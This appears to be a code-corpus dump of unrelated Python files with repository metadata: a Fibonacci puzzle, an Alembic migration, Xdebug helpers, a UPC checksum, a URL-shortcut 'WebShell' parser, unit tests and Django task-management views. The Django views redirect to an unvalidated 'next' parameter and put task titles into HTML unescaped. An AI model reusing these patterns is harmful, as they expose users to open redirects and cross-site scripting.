if response.status < 200 or response.status > 299:
response.read()
raise ResponseError(response.status, response.reason)
UTF-8
Python
false
false
2,013
7,009,386,653,702
a02442a5fb11cb4c260757fa129bae43c9984d8b
495d8bd9ab41c7bf66e640b8f3006db4a227211b
/problem2.py
c6940288346ed6f80b70caf0fca56fe9f391c827
[]
no_license
billputer/project-euler
https://github.com/billputer/project-euler
e18161e76168dc0818dde2a0d34786cd7f10c66a
305e0fa2ae1c628ebb29c0277f776f930f0ba2b6
refs/heads/master
2021-01-13T02:14:32.977962
2014-10-24T23:18:06
2014-10-24T23:22:50
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
def fib():
"""Infinite Fibbonacci sequence generator"""
yield 1
yield 2
nminus2 = 1
nminus1 = 2
while True:
n = nminus2 + nminus1
nminus2 = nminus1
nminus1 = n
yield n
# By considering the terms in the Fibonacci sequence whose values do not
# exceed four million, find the sum of the even-valued terms.
s = 0
for x in fib():
# stop when we exceed 4 million
if x > 4000000:
break
# if even, add to s
elif x % 2 == 0:
s += x
print s
UTF-8
Python
false
false
2,014
2,559,800,524,654
aec7226501f9623107c95eb8a56fb4479cc0d66b
7239bd3fd1a3fdd04273e109a2bff43813a1cd72
/alembic/versions/534f351a3913_re.py
b3551ca8ab6df5cbe8c1a5440f92d6542e04235f
[]
no_license
okamurayasuyuki/basic_flask
https://github.com/okamurayasuyuki/basic_flask
03015d6bb12089a18e5c1b1b70419c7b6f8aaabe
7a032dcaa841c4e9d9176188a2c6cbae2185c984
refs/heads/master
2020-05-18T11:25:54.213904
2013-11-01T09:23:12
2013-11-01T09:23:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""re
Revision ID: 534f351a3913
Revises: f3b5472547c
Create Date: 2013-11-01 06:43:17.972648
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '534f351a3913'
down_revision = 'f3b5472547c'
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tags', u'title')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('tags', sa.Column(u'title', mysql.VARCHAR(length=30), nullable=True))
### end Alembic commands ###
UTF-8
Python
false
false
2,013
15,161,234,570,462
eabc887464e58c231854e7c0a1b895b3d8f0252e
df3122dad4c883652e303a3befe09d4b30477dea
/xdebug/util.py
fb2161c5e31b7cc7bd9b5f24df1d4ddd887ab4c7
[
"MIT"
]
permissive
thinktandem/SublimeTextXdebug
https://github.com/thinktandem/SublimeTextXdebug
59b92b2812a403c2a8fa66c96de5f1dedd60346d
d6118fa1a402c3b323d7e9052e3e4eb1648a19a6
refs/heads/master
2021-05-27T04:01:45.994500
2013-08-15T04:01:52
2013-08-15T04:01:52
12,124,303
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import sublime
import json
import os
import re
import sys
import webbrowser
# Helper module
try:
from .helper import H
except:
from helper import H
# Settings variables
try:
from . import settings as S
except:
import settings as S
# Log module
from .log import debug, info
def get_real_path(uri, server=False):
"""
Get real path
Keyword arguments:
uri -- Uri of file that needs to be mapped and located
server -- Map local path to server path
TODO: Fix mapping for root (/) and drive letters (P:/)
"""
if uri is None:
return uri
# URLdecode uri
uri = H.url_decode(uri)
# Split scheme from uri to get absolute path
try:
# scheme:///path/file => scheme, /path/file
# scheme:///C:/path/file => scheme, C:/path/file
transport, filename = uri.split(':///', 1)
except:
filename = uri
# Normalize path for comparison and remove duplicate/trailing slashes
uri = os.path.normpath(filename)
# Pattern for checking if uri is a windows path
drive_pattern = re.compile(r'^[a-zA-Z]:[\\/]')
# Append leading slash if filesystem is not Windows
if not drive_pattern.match(uri) and not os.path.isabs(uri):
uri = os.path.normpath('/' + uri)
path_mapping = S.get_project_value('path_mapping') or S.get_package_value('path_mapping')
if not path_mapping is None:
# Go through path mappings
for server_path, local_path in path_mapping.items():
server_path = os.path.normpath(server_path)
local_path = os.path.normpath(local_path)
# Replace path if mapping available
if server:
# Map local path to server path
if local_path in uri:
uri = uri.replace(local_path, server_path)
break
else:
# Map server path to local path
if server_path in uri:
uri = uri.replace(server_path, local_path)
break
else:
sublime.status_message("Xdebug: No path mapping defined, returning given path.")
# Replace slashes
if not drive_pattern.match(uri):
uri = uri.replace("\\", "/")
# Append scheme
if server:
return H.url_encode("file://" + uri)
return uri
def launch_browser():
url = S.get_project_value('url') or S.get_package_value('url')
if not url:
sublime.status_message('Xdebug: No URL defined in (project) settings file.')
return
ide_key = S.get_project_value('ide_key') or S.get_package_value('ide_key') or S.DEFAULT_IDE_KEY
if S.SESSION and (S.SESSION.listening or not S.SESSION.connected):
webbrowser.open(url + '?XDEBUG_SESSION_START=' + ide_key)
else:
webbrowser.open(url + '?XDEBUG_SESSION_STOP=' + ide_key)
def load_breakpoint_data():
data_path = os.path.join(sublime.packages_path(), 'User', S.FILE_BREAKPOINT_DATA)
data = {}
try:
data_file = open(data_path, 'rb')
except:
e = sys.exc_info()[1]
info('Failed to open %s.' % data_path)
debug(e)
try:
data = json.loads(H.data_read(data_file.read()))
except:
e = sys.exc_info()[1]
info('Failed to parse %s.' % data_path)
debug(e)
# Do not use deleted files or entries without breakpoints
if data:
for filename, breakpoint_data in data.copy().items():
if not breakpoint_data or not os.path.isfile(filename):
del data[filename]
if not isinstance(S.BREAKPOINT, dict):
S.BREAKPOINT = {}
# Set breakpoint data
S.BREAKPOINT.update(data)
def save_breakpoint_data():
data_path = os.path.join(sublime.packages_path(), 'User', S.FILE_BREAKPOINT_DATA)
with open(data_path, 'wb') as data:
data.write(H.data_write(json.dumps(S.BREAKPOINT)))
#!/usr/bin/env python3
"""
Perform a checksum on a UPC.
This module contains one function checksum. It can be passed a parameter
that is a string which must be 12 characters long. All
other inputs will result in an error.
Assignment 1, Exercise 2, INF1340 Fall 2014
"""
__author__ = 'Sam Novak and Jodie Church'
__copyright__ = "2014 Sam Novak and Jodie Church"
__license__ = "MIT License"
__status__ = "Prototype"
def checksum(upc):
"""
Checks if the digits in a UPC is consistent with checksum
:param upc: a 12-digit universal product code
:return:
Boolean: True, checksum is correct
False, otherwise
:raises:
TypeError if input is not a string
ValueError if string is the wrong length (with error string stating how many digits are over or under
"""
# check type of input
if type(upc) is str:
# check length of string
if len(upc) != 12:
# raise ValueError if not 12
raise ValueError("UPC must be 12 characters")
else:
# raise TypeError if not string
raise TypeError("Invalid type passed as parameter")
# convert string to array the list function
upc_list = list(upc)
# begin calculation for UPC checksum
# initialize variable for the sum of odd numbers
odd_sum = 0
for digit in upc_list[0::2]: # loop through every other digit in list starting from first item
odd_sum += int(digit) # add integer value of digit to odd_sum
# initialize variable for the sum of even numbers
even_sum = 0
for digit in upc_list[1:11:2]: # loop through every other digit in list starting from second item
even_sum += int(digit) # add integer value of digit to even_sum
# perform multiplication, addition, and modulo operations
check_sum = (even_sum + (odd_sum * 3)) % 10
# condition operation if check_cum i
if check_sum != 0:
check_sum = 10 - check_sum
if check_sum == int(upc_list[11]):
return True
else:
return False
# WebShell.py - class for parsing awebshell commands, parsing web shell URLs, and determining a final resulting URL.
#
# Copyright 2013 Lee Bush. All rights reserved.
# Copyright 2013 AllStruck. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#There are some TODO and ZZZ items below that need to be addressed.
#Also, I do not claim that this is the most efficient way to parse, but it gets the job done...
#Don't forget to add/maintain the test cases in the 'tests' folder as you change this code.
# -Lee
__all__ = ['WebShell']
#syntax highlight URLs
#validate URLs
import re
import urllib
import types
KEY_NAME_STRING_REGEX_STRING = r'[_A-Za-z][_A-Za-z0-9]*'
VALUE_STRING_REGEX_STRING = r'[^{}]*'
VAR_REFERENCE_REGEX_STRING = r'\$\{(' + KEY_NAME_STRING_REGEX_STRING + r')\}'
PARAMETER_REGEX = re.compile(r'\$\{(' + KEY_NAME_STRING_REGEX_STRING + r')([=]' + VALUE_STRING_REGEX_STRING + r')?\}')
CASE_THEN_VALUE_REGEX_STRING = r'[^={}]+ \=\> [^={},]+'
CASE_THEN_VALUE_REGEX = re.compile(CASE_THEN_VALUE_REGEX_STRING)
SWITCH_REGEX = re.compile(r'\{ switch ' + VAR_REFERENCE_REGEX_STRING + '( \| )(' + CASE_THEN_VALUE_REGEX_STRING + ')(, ' + CASE_THEN_VALUE_REGEX_STRING + ')*( \})')
#SWITCH_REGEX = re.compile(r'\{(:\s)*switch(:\s)+' + VAR_REFERENCE_REGEX_STRING + r'(:\s*\|)(\s)*(' + CASE_THEN_VALUE_REGEX_STRING + r')(,(:\s)*' + CASE_THEN_VALUE_REGEX_STRING + r')*(\s*\})') #ZZZ broken! not working like I want...
#assert(re.compile(r'\{\s*').match('{'))
#assert(re.compile(r'\{\s*').match('{ '))
#print re.compile(r'\{(:\s)*').match('{ ').regs
#assert(not re.compile(r'\{(:\s*)').match('{{ '))
#print OPTION_POST_REGEX.match('[post]').groups() #ZZZ test.
#print OPTION_USE_X_FOR_SPACES_REGEX.match('[use - for spaces]').groups()#ZZZ test.
#print SWITCH_REGEX.match('{ switch ${plat} | xbox => 13 }').groups()
#print SWITCH_REGEX.match('{ switch ${plat} | * => 13 }').groups()
#print SWITCH_REGEX.match('{ switch ${plat} | xbox => 13, dreamcast => 1, * => 0 }').groups() #ZZZ not getting dreamcast. need different loop-group extraction technique.
OPTION_POST_REGEX = re.compile(r'[[]post[]]')
OPTION_USE_X_FOR_SPACES_REGEX = re.compile(r'[[]use ([^]{} ]+) for spaces[]]')
OPTION_NO_URL_ENCODING_REGEX = re.compile(r'[[]no url encoding[]]')
from web_shell_exceptions import WebShellError, UnknownCommandError, CommandParseError, MissingParameterException, InvalidParameterValueException
class WebShell:
'''
The WebShell class receives commands (i.e., gim penguins), looks up comand names in the
provided command database, and then evaluates the final URL.
Example:
command_database = ... #create your command database somehow
web_shell = WebShell(command_database) #create web shell object
url, can_inline = web_shell.evaluate('gim penguins') #run command and determine resulting URL
#now goto the url...
'''
INLINE_COMMANDS_SET = set(['cat', 'date']) #ZZZ this will be refactored and removed
def __init__(self, command_database):
'''
Create a WebShell object.
The command_database parameter is an object that must provide a get_command_web_shell_url() method.
This method receives a command name as a parameter, and must return a Web Shell URL string:
command_database.get_command_web_shell_url(command_name) => web_shell_url
'''
assert(hasattr(command_database, 'get_command_web_shell_url'))
self.__command_database = command_database
def validate_web_shell_url(self, web_shell_url):
'''
return True if the given Web Shell URL appears to be syntactically correct.
return False otherwise.
'''
raise NotImplemented #ZZZ stub
def evaluate(self, query_string):
'''
return (final_url, can_inline)
'''
#print 'query_string: ' + repr(query_string)
query_string = query_string.strip() #remove all spaces from beginning and end of query.
tokens = query_string.split()
#print 'tokens: ' + repr(tokens)
if (len(tokens) < 1):
return ('', False)
else:
command = tokens[0]
arguments = tokens[1:]
arguments_text = ' '.join(arguments)
web_shell_url, can_inline = self.__get_command_web_shell_url_and_inline(command)
evaluated_url = self.__execute_web_shell_url(web_shell_url, arguments_text)
return (evaluated_url, can_inline)
def __get_command_web_shell_url_and_inline(self, name):
'''
return tuple of the form (web_shell_url, can_inline) associated with the given command name.
'''
can_inline = (name in WebShell.INLINE_COMMANDS_SET)
web_shell_url = self.__command_database.get_command_web_shell_url(name)
assert(type(web_shell_url) in (types.StringType, types.UnicodeType)) #ensure database is following proper protocol
return (web_shell_url, can_inline) #ZZZ stub
#return the tuple (respaced_argument_text, parameter_dictionary)
def __parse_command_arguments(self, raw_argument_text):
tokens = raw_argument_text.split()
parameter_dictionary = {}
respaced_argument_text = ''
current_key = None
mode = 'initial'
for token in tokens:
if (mode == 'initial'):
if (token.startswith('-')):
current_key = token[1:]
parameter_dictionary[current_key] = ''
mode = 'got_key'
else:
if (respaced_argument_text):
respaced_argument_text += ' '
respaced_argument_text += token
elif (mode == 'got_key'):
if (token.startswith('-')):
raise ComandParseError("expected an argument value for '%s', but recieved a new argument name of '%s'." % (current_key, token))
else:
parameter_dictionary[current_key] = token
mode = 'more_values'
elif (mode == 'more_values'):
if (token.startswith('-')):
current_key = token[1:]
parameter_dictionary[current_key] = ''
mode = 'got_key'
else:
if (parameter_dictionary[current_key]):
parameter_dictionary[current_key] += ' '
parameter_dictionary[current_key] += token
else:
assert(False) #should never happen
#print 'parameter_dictionary=', parameter_dictionary
return (respaced_argument_text, parameter_dictionary)
def __execute_web_shell_url(self, web_shell_url, raw_argument_text):
assert type(web_shell_url) in (types.StringType, types.UnicodeType)
#print web_shell_url
web_shell_url, options = self.__strip_web_shell_url_options(web_shell_url)
assert type(web_shell_url) in (types.StringType, types.UnicodeType)
raw_argument_text, arguments = self.__parse_command_arguments(raw_argument_text)
#print (web_shell_url, options)
#print (raw_argument_text, arguments)
arguments_and_defaults_dictionary = {} #Note: if value is None, then the parameter is required
web_shell_url_length = len(web_shell_url)
final_url = ''
start = 0
match_result = 'x' #something that is not None
while (match_result is not None):
#print 'x'
match_result = SWITCH_REGEX.search(web_shell_url)
if (match_result is not None):
p0, p1 = match_result.regs[0]
#print 'switch groups: ', match_result.groups()
switch_var_name = match_result.group(1)
p2 = match_result.regs[2][1]
p3 = match_result.regs[4][1]
switch_cases_text = web_shell_url[p2:p3]
#print 'switch_cases_text', switch_cases_text
final_url = final_url + web_shell_url[0:p0] + self.__execute_switch_case_handler(switch_var_name, switch_cases_text, arguments)
web_shell_url = web_shell_url[p1:]
#print (switch_var_name, switch_cases_text)
web_shell_url = final_url + web_shell_url
#parse and replace ${variable} and ${variable=default_value} forms ----
web_shell_url_length = len(web_shell_url)
final_url = ''
match_result = 'x' #something that is not None
while (match_result is not None):
match_result = PARAMETER_REGEX.search(web_shell_url, start)
if (match_result is None):
break
key, value = match_result.groups()
if (value is not None):
value = value[1:] #chop off '=' at beginning
arguments_and_defaults_dictionary[key] = value
p0, p1 = match_result.regs[0]
first_chunk = web_shell_url[0:p0]
#print '\n\n\nfirst_chunk=', first_chunk
final_url += first_chunk
#print 'THING REPLACING: ', repr(web_shell_url[p0:p1])
web_shell_url = web_shell_url[p1:]
#print 'web_shell_url', web_shell_url
if (arguments.has_key(key)):
final_url += self.__encode(arguments[key], options)
else:
if (value is not None):
final_url += self.__encode(value, options)
else:
raise MissingParameterException("Mandatory value for parameter '%s' not provided." % key)
#print arguments_and_defaults_dictionary
web_shell_url = final_url + web_shell_url
web_shell_url = web_shell_url.replace('%s', self.__encode(raw_argument_text, options))
return web_shell_url
def __encode(self, input_string, options):
space_replacer = options['space_replacer']
if (space_replacer is None):
space_replacer = '+'
tokens = input_string.split() #split on whitespace
if (options['encode_url']):
tokens = map(urllib.quote, tokens, ['']*len(tokens)) #the urllib quote "safe" list is set empty so we can encode the slash.
result_string = space_replacer.join(tokens)
#ZZZ handle options['post'] here????
return result_string
def __strip_web_shell_url_options(self, web_shell_url):
assert type(web_shell_url) in (types.StringType, types.UnicodeType)
options = {}
match_result = OPTION_POST_REGEX.search(web_shell_url)
if (match_result is None):
options['post'] = False
else:
options['post'] = True
p0, p1 = match_result.regs[0]
web_shell_url = web_shell_url[0:p0] + web_shell_url[p1:]
match_result = OPTION_USE_X_FOR_SPACES_REGEX.search(web_shell_url)
if (match_result is None):
options['space_replacer'] = None
else:
options['space_replacer'] = match_result.group(1)
p0, p1 = match_result.regs[0]
web_shell_url = web_shell_url[0:p0] + web_shell_url[p1:]
match_result = OPTION_NO_URL_ENCODING_REGEX.search(web_shell_url)
if (match_result is None):
options['encode_url'] = True
else:
options['encode_url'] = False
p0, p1 = match_result.regs[0]
web_shell_url = web_shell_url[0:p0] + web_shell_url[p1:]
assert type(web_shell_url) in (types.StringType, types.UnicodeType)
return (web_shell_url, options)
def __execute_switch_case_handler(self, switch_variable_name, switch_case_text, variable_value_dictionary):
DEFAULT_CASE_KEY = '*'
#print dir(CASE_THEN_VALUE_REGEX)
#print switch_variable_name
#print variable_value_dictionary
matches = CASE_THEN_VALUE_REGEX.findall(switch_case_text)
case_dictionary = {}
for match_text in matches:
case_value, result_value = match_text.split('=>')
case_value = case_value.strip()
if (case_value.startswith(',')):
case_value = case_value[1:].lstrip()
result_value = result_value.strip()
case_dictionary[case_value] = result_value
#print 'case_dictionary=', case_dictionary
if (not variable_value_dictionary.has_key(switch_variable_name)):
if (case_dictionary.has_key(DEFAULT_CASE_KEY)):
return case_dictionary[DEFAULT_CASE_KEY]
else:
raise MissingParameterException("Error: required parameter '%s' not provided." % switch_variable_name)
else:
switch_variable_value = variable_value_dictionary[switch_variable_name]
if (case_dictionary.has_key(switch_variable_value)):
return case_dictionary[switch_variable_value]
else:
acceptable_keys = sorted(case_dictionary.keys())
error_message = "Error: invalid value for parameter '%s': '%s'. The only acceptable values are: %s." % \
(switch_variable_name, switch_variable_value, acceptable_keys)
raise InvalidParameterValueException(error_message)
assert(False) #should never get here
"""
This file is part of Shell-Sink.
Copyright Joshua Cronemeyer 2008, 2009
Shell-Sink is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Shell-Sink is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License v3 for more details.
You should have received a copy of the GNU General Public License
along with Shell-Sink. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
from shellsink_client import *
from mock import Mock
import os
class TestInlineTag(unittest.TestCase):
def test_one_inline_tag(self):
client = StubClient()
self.assertEqual(['tag'], client.inline_tags("echo #tag"))
def test_zero_inline_tags(self):
client = StubClient()
self.assertEqual(None, client.inline_tags("echo"))
def test_two_inline_tags(self):
client = StubClient()
self.assertEqual(["tag1", "tag2"], client.inline_tags("echo #tag1:tag2"))
def test_one_escaped_comment_delimiter(self):
client = StubClient()
self.assertEqual(None, client.inline_tags("echo \#tag1:tag2"))
def test_one_escaped_comment_delimiter_and_one_unescaped(self):
client = StubClient()
self.assertEqual(["tag2"], client.inline_tags("echo \#tag1 #tag2"))
def test_two_escaped_comment_delimiters_and_two_unescaped(self):
client = StubClient()
self.assertEqual(["tag1", "tag2"], client.inline_tags("echo \#tag1 \#tag2 #tag1:tag2"))
#These document a known issue.
# def test_strange_adjoining_comments_are_escaped_behavior(self):
# client = StubClient()
# self.assertEqual(None, client.inline_tags("echo \##tag"))
# def test_strange_adjoining_comments_are_escaped_behavior_can_have_tag_later(self):
# client = StubClient()
# self.assertEqual(["taglater"], client.inline_tags("echo \##tag #taglater"))
class StubClient(Client):
def __init__(self):
pass
if __name__ == '__main__':
unittest.main()
from datetime import date, datetime, timedelta
import subprocess
from django.conf import settings
from django.db.models import Q, Sum, Avg, Count
from django.contrib.admin.models import LogEntry, ADDITION, CHANGE, DELETION
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.utils.encoding import force_unicode
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib import messages
from django.http import Http404
from django.views.generic import DetailView, ListView, CreateView, UpdateView
from django.views.generic.edit import FormMixin, ModelFormMixin
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.core.cache import cache
from django.core.management import call_command
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.utils.decorators import method_decorator
from django.utils import timezone
from django.core.mail import send_mail
from django.views.generic.base import View
from pm.models import Project, Task, Profile, ContentImport, Team
from pm.forms import TaskForm, TaskMiniForm, TaskCloseForm, ProjectForm, ProfileForm
from pm.tasks import send_notification
from pm.utils import get_task_change_message, get_project_change_message, get_profile_change_message
START_DT_INITIAL = timezone.now()
END_DT_INITIAL = timezone.now() + timedelta(days=90)
DUE_DT_INITIAL = timezone.now() + timedelta(weeks=1)
#Custom Action Flags
CLOSED = 5
MISSED = 6
def UserCurrent(request):
if request.user.is_authenticated():
return HttpResponseRedirect(reverse('user_detail', args=[request.user.username]))
return HttpResponseRedirect(reverse('home'))
def UserIdRedirect(request, pk=None):
user = get_object_or_404(User, pk=pk)
return HttpResponseRedirect(reverse('user_detail', args=[user.username]))
class UserListView(ListView):
model = Profile
template_name = "proman/user_list.html"
@method_decorator(staff_member_required)
def dispatch(self, *args, **kwargs):
return super(UserListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(UserListView, self).get_context_data(**kwargs)
context['inactive_employees'] = Profile.objects.inactive_employees()
context['active_employees'] = Profile.objects.active_employees()
inactive_employees = context['inactive_employees']
inactive_pks = [p.pk for p in inactive_employees]
context['open_projects_inactives'] = Project.objects.filter(version=False, owner_id__in=inactive_pks).exclude(status="done")
context['open_tasks_inactives'] = Task.objects.filter(version=False, owner_id__in=inactive_pks, completed=False)
return context
class ContactListView(UserListView):
queryset = Profile.objects.filter(user__is_staff=False).order_by('last_name')
context_object_name = "profiles"
template_name = "proman/client_list.html"
class TeamListView(UserListView):
queryset = Team.objects.all().order_by('name')
context_object_name = "teams"
template_name = "proman/profiles/team_list.html"
class UserCreateView(CreateView):
"""
Creates a Profile
"""
form_class = ProfileForm
template_name = "proman/user_update.html"
@method_decorator(staff_member_required)
def dispatch(self, *args, **kwargs):
return super(UserCreateView, self).dispatch(*args, **kwargs)
def form_valid(self, form):
self.object = form.save()
username = self.object.email
if form.cleaned_data['username']:
username = form.cleaned_data['username']
user_object = User.objects.create(username=username, email=self.object.email, first_name=self.object.first_name, last_name=self.object.last_name, is_active=True)
self.object.user = user_object
self.object.save()
change_message = "added this profile"
LogEntry.objects.log_action(
user_id = self.request.user.pk,
content_type_id = ContentType.objects.get_for_model(self.object).pk,
object_id = self.object.pk,
object_repr = force_unicode(self.object),
action_flag = ADDITION,
change_message = change_message
)
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.request.GET.has_key('next'):
messages.success(self.request, 'Successfully added the profile for <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.nice_name()), extra_tags='success profile-%s' % self.object.pk)
return self.request.GET['next']
messages.success(self.request, 'Successfully added this profile.', extra_tags='success profile-%s' % self.object.pk)
return self.object.get_absolute_url()
class UserUpdateView(UpdateView):
"""
Updates a Profile
"""
form_class = ProfileForm
template_name = "proman/user_update.html"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserUpdateView, self).dispatch(*args, **kwargs)
def get_object(self, **kwargs):
obj = get_object_or_404(Profile, pk=self.kwargs['pk'])
return obj
def get_initial(self):
super(UserUpdateView, self).get_initial()
if self.get_object().user.is_staff:
role = "1"
else:
role = "0"
self.initial = {
"username": self.get_object().user.username,
"role": role,
"active": self.get_object().user.is_active,
}
return self.initial
def form_valid(self, form):
self.object = form.save(commit=False)
orig = Profile.objects.get(pk=self.object.pk)
self.object = form.save()
profile = self.object
profile.user.first_name = profile.first_name
profile.user.last_name = profile.last_name
profile.user.email = profile.email
profile.user.username = form.cleaned_data['username']
if form.cleaned_data['role'] == "1":
profile.user.is_staff = True
else:
profile.user.is_staff = False
profile.user.is_active = form.cleaned_data['active']
profile.user.save()
change_message = get_profile_change_message(orig, self.object)
LogEntry.objects.log_action(
user_id = self.request.user.pk,
content_type_id = ContentType.objects.get_for_model(self.object).pk,
object_id = self.object.pk,
object_repr = force_unicode(self.object),
action_flag = CHANGE,
change_message = change_message
)
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.request.GET.has_key('next'):
messages.success(self.request, 'Successfully updated the profile for <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.nice_name()), extra_tags='success profile-%s' % self.object.pk)
return self.request.GET['next']
messages.success(self.request, 'Successfully updated this profile.', extra_tags='success profile-%s' % self.object.pk)
return self.object.get_absolute_url()
class UserDetailView(DetailView):
model = Profile
context_object_name = "profile"
template_name = "proman/profile_detail.html"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserDetailView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(UserDetailView, self).get_context_data(**kwargs)
# Pull projects for a client
if context['profile'].client:
context['user_projects'] = Project.objects.filter(version=False, client=context['profile'].client).order_by('-status', 'start_dt')
context['user_open_project_tasks'] = Task.objects.filter(version=False, project__client=context['profile'].client).exclude(completed=True, private=True).order_by('due_dt')
context['results_paginate'] = "10"
return context
def get_object(self, **kwargs):
obj = get_object_or_404(Profile, user__username=self.kwargs['username'])
return obj
def render_to_response(self, context):
"""Used to pull paginated items via a GET"""
if self.request.method == 'GET':
if self.request.GET.get('open_task_page'):
open_task_page = self.request.GET.get('open_task_page')
paginator = Paginator(context['user_open_project_tasks'], context['results_paginate'])
task_items = paginator.page(open_task_page).object_list
return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
if self.request.GET.get('done_task_page'):
done_task_page = self.request.GET.get('done_task_page')
paginator = Paginator(context['user_done_project_tasks'], context['results_paginate'])
task_items = paginator.page(done_task_page).object_list
return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
if self.request.GET.get('done_task_search'):
done_task_count = self.request.GET.get('done_task_search')
task_items = context['user_done_project_tasks'][done_task_count:]
return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
if self.request.GET.get('open_task_search'):
open_task_count = self.request.GET.get('open_task_search')
task_items = context['user_open_project_tasks'][open_task_count:]
return render_to_response("proman/task_table_items.html", locals(), context_instance=RequestContext(self.request))
return render_to_response(self.template_name, context, context_instance=RequestContext(self.request))
class TaskNotificationMixin(View):
def task_notification(self):
""" Create and send a notification as a celery task """
site_url = Site.objects.all()[0].domain
notice = send_notification.delay('[PM] Task Assigned: %s (%s)' % (self.object.title, self.object.project.client), 'You have just been assigned the following task from <a href="http://%s%s">%s</a>: <br /><br /><strong>%s</strong> (http://%s%s)<br />Due: (%s days)<br /><br /> %s<br /><br />' % (
site_url,
self.request.user.profile.get_absolute_url(),
self.request.user.profile.nice_name(),
self.object.title,
site_url,
self.object.get_absolute_url(),
self.object.due_age(),
self.object.description
), self.request.user.email, [self.object.owner.email], fail_silently=False)
return notice
class TaskCreateView(CreateView, TaskNotificationMixin):
"""
Creates a Task
"""
form_class = TaskForm
template_name = "proman/task_update.html"
success_url = '/projects/'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(TaskCreateView, self).dispatch(*args, **kwargs)
def get_initial(self):
super(TaskCreateView, self).get_initial()
project = self.request.GET.get("project")
user = self.request.user
self.initial = {"owner":user.id, "project":project, "due_dt": DUE_DT_INITIAL}
return self.initial
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.original_creator = self.request.user.profile
self.object.editor = self.request.user.profile
self.object.save()
self.object.original = self.object
self.object.save()
change_message = "added this task"
LogEntry.objects.log_action(
user_id = self.request.user.pk,
content_type_id = ContentType.objects.get_for_model(self.object).pk,
object_id = self.object.pk,
object_repr = force_unicode(self.object),
action_flag = ADDITION,
change_message = change_message
)
if self.request.user.profile != self.object.owner:
# If you aren't the owner, send the owner an email.
self.task_notification()
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.request.GET.has_key('next'):
messages.success(self.request, 'Successfully added the task <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.title), extra_tags='success task-%s' % self.object.pk)
return self.request.GET['next']
messages.success(self.request, 'Successfully added the task <strong>%s</strong>.' % self.object.title, extra_tags='success task-%s' % self.object.pk)
return HttpResponseRedirect(reverse('project_detail', args=[self.object.project.pk]))
class TaskUpdateView(UpdateView, TaskNotificationMixin):
"""
Updates a Task
"""
form_class = TaskForm
template_name = "proman/task_update.html"
success_url = '/projects/'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(TaskUpdateView, self).dispatch(*args, **kwargs)
def get_object(self, **kwargs):
obj = get_object_or_404(Task, pk=self.kwargs['pk'])
return obj
def form_valid(self, form):
self.object = form.save(commit=False)
orig = Task.objects.get(pk=self.object.pk)
new_obj = orig
new_obj.pk = None
new_obj.editor = self.request.user.profile
new_obj.version = True
new_obj.save()
self.object.save()
action_flag = CHANGE
change_message = get_task_change_message(orig, self.object)
# if changed from not done to done
if not orig.completed and self.object.completed:
action_flag = CLOSED
LogEntry.objects.log_action(
user_id = self.request.user.pk,
content_type_id = ContentType.objects.get_for_model(self.object).pk,
object_id = self.object.pk,
object_repr = force_unicode(self.object),
action_flag = action_flag,
change_message = change_message
)
if self.request.user.profile != self.object.owner and new_obj.owner != self.object.owner:
# If you aren't changing to yourself, and the owner changed, send them an email.
self.task_notification()
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.request.GET.has_key('next'):
messages.success(self.request, 'Successfully updated the task <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.title), extra_tags='success task-%s' % self.object.pk)
return self.request.GET['next']
messages.success(self.request, 'Successfully updated this task.', extra_tags='success task-%s' % self.object.pk)
return self.object.get_absolute_url()
class TaskCloseUpdateView(TaskUpdateView, TaskNotificationMixin):
"""
Mini Form to Close a Task
"""
form_class = TaskCloseForm
def get_success_url(self):
if self.request.GET.has_key('next'):
messages.success(self.request, 'Successfully closed the task <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.title), extra_tags='success task-%s' % self.object.pk)
return self.request.GET['next']
messages.success(self.request, 'Successfully closed this task.', extra_tags='success task-%s' % self.object.pk)
return self.object.get_absolute_url()
